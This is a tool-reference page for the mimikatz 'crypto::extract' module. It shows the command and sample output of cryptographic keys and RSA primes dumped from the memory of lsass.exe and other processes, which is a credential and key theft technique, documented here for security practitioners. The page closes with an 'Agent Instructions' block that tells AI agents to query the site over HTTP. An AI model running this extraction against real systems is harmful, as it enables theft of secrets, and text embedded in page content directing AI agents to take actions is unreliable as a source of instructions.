# extract `crypto::extract` extracts keys from the CAPI RSA/AES provider (Experimental :warning:). ``` mimikatz # crypto::extract lsass.exe (816) AlgId : 3DES (0x10005) Mode : ChainingModeCBC (0x1) IV : 8a8c03aa5722b0ea Key ( 24) : 1a4202f442ebde5aa20d72ea32ed1c30a83ee5ce2048a50a AlgId : AES (0x10002) Mode : ChainingModeCFB (0x3) Key ( 16) : 213d8d48ff884017252091c4c3361b38 AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : ee9eb08d70250d26e6f6c4cb8d92df5d AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : de3f10f59ca7c63edb40e06dd152a7e0 AlgId : RSA (0x30001) PubExp : 4d11aa323757497ef5de5d526b8ba2502e6053aa9a6d55d2c2d2edcb310e6007550bf09c0fa5cf15da082fadf07398fab29fd803ad048235d95e2ee88e3c3ff39e083eaee1ac0d079b2b6664731742dfbb2fea5f39bfc6f59c0e3e724a27759a2c79d7c4c703c99256e1a664f278acb27cf015711ad9791424aee001f869d5f10c8b951aa5d561aa0dea8ce71d486d19ad632dac057143a25b1090d69d38fa03b2c794398cde74e4b57f3eee63573bcf144b392c86d57b66892afbce9ab5106bee7c03a5bb5cb4534f40c0e723a0905b4b9b38ee9504e7bb9357d880993e3bc2f353f2b92bd13b709758a9ac44fba685eb03a5b1c02db25893419888b0d27610 Modulus : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime1 : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime2 : 8b50756840dc6f1e3e3ac17b0a977d7ffe7dcef561d8a8f9e73e5530c213722cbb7725bab3334cc18b432954d3f6a425b82d0188fdc39825b1fc2743b2ade05e60e949dbd06d66a8823192d80afd6d92736b2bbd3a07654a680ba90084a5066ff180c3a1fe28d5ba8617fb6fadb383763f5261abfe4e0a45f0c8490f55bd09c5 AlgId : RSA (0x30001) AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 32) : 6d9fc1ae597be017a7e44c9b41dae46f5b690d01f7642043e0a0180197e1e2bb AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 16) : 932b41c722cdc1e2b9291b2789ca664b svchost.exe (2328) svchost.exe (5244) AlgId : ECDSA_P256 (0x30004) AlgId : ECDSA_P256 (0x30004) chrome.exe (8300) Algid : CALG_RSA_KEYX (0xa400) Key (284) : 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe (7084) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://tools.thehacker.recipes/mimikatz/modules/crypto/extract.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.